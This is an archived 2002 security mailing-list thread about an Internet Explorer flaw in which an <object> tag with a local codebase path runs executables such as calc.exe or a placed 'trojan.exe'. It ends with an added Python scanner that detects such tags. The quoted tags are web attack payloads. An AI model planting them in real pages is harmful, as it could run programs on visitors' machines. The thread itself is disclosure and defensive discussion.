Vulnerability Development mailing list archives
Re: IExplorer
From: "CT" <ct () arnet com ar>
Date: Thu, 7 Mar 2002 02:34:59 -0300
http://server/quickstart/aspplus/samples/webforms/ctrlref/htmlctrl/HtmlInputFile/VB/HtmlInputFile1.aspx
+
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/temp/trojan.exe"></object>

Probably with this example [careless combination] and social engineering, a silly IIS box manager it affects ... in another way it is not checked since I have not had time for the moment.

Best regards
CT
www.heinekenteam.com

I wanted to install Opera in my Windows box, but... Luciano Pavarotti ate up.

----- Original Message -----
From: "Steve" <steve () frij com au>
To: <vuln-dev () securityfocus com>; <bugtraq () securityfocus com>
Sent: Wednesday, March 06, 2002 8:54 PM
Subject: IExplorer

I know we have seen many websites already showing this as a problem.

<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>

Of course, this is part of the HTML that is causing this problem, but I was unable to reformat the string to cause any substantial privilege escalation in the system, via this bug.
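
A defensive check for the markup pattern quoted in this thread, added here as an example and not part of any poster's message: it scans HTML (a proxy capture, a mail body, a saved page) for <object> tags whose codebase attribute is a drive-letter path, UNC path or file: URL. The function names, the extension list and the sample input are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser

# Non-network forms of a codebase value: drive letter, UNC share, or file: URL.
LOCAL_PATH = re.compile(r"^(?:[a-z]:[\\/]|\\\\|file:)", re.IGNORECASE)
# Extensions treated as directly executable on Windows (assumed, not exhaustive).
EXECUTABLE_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif")


class ObjectCodebaseScanner(HTMLParser):
    """Collects <object> tags whose codebase points at a local or UNC path."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <OBJECT CODEBASE=...> matches too.
        if tag != "object":
            return
        attr = {name: (value or "") for name, value in attrs}
        codebase = attr.get("codebase", "").strip()
        if not LOCAL_PATH.match(codebase):
            return
        line, _col = self.getpos()
        # Drop any "#version=..." fragment or query string before checking the extension.
        path = re.split(r"[#?]", codebase, maxsplit=1)[0].lower()
        self.findings.append({
            "line": line,
            "classid": attr.get("classid", ""),
            "codebase": codebase,
            "executable": path.endswith(EXECUTABLE_EXT),
        })


def scan_html(markup):
    """Return one finding per <object> tag with a local or UNC codebase."""
    scanner = ObjectCodebaseScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


# Constructed sample: one tag in the form quoted in the thread, one ordinary remote codebase.
SAMPLE = """<html><body>
<OBJECT ID="oFile" CLASSID="clsid:11111111-1111-1111-1111-111111111111" CODEBASE="c:/winnt/system32/calc.exe"></OBJECT>
<object classid="clsid:00000000-0000-0000-0000-000000000000" codebase="http://example.com/cab/control.cab#version=1,0,0,0"></object>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```
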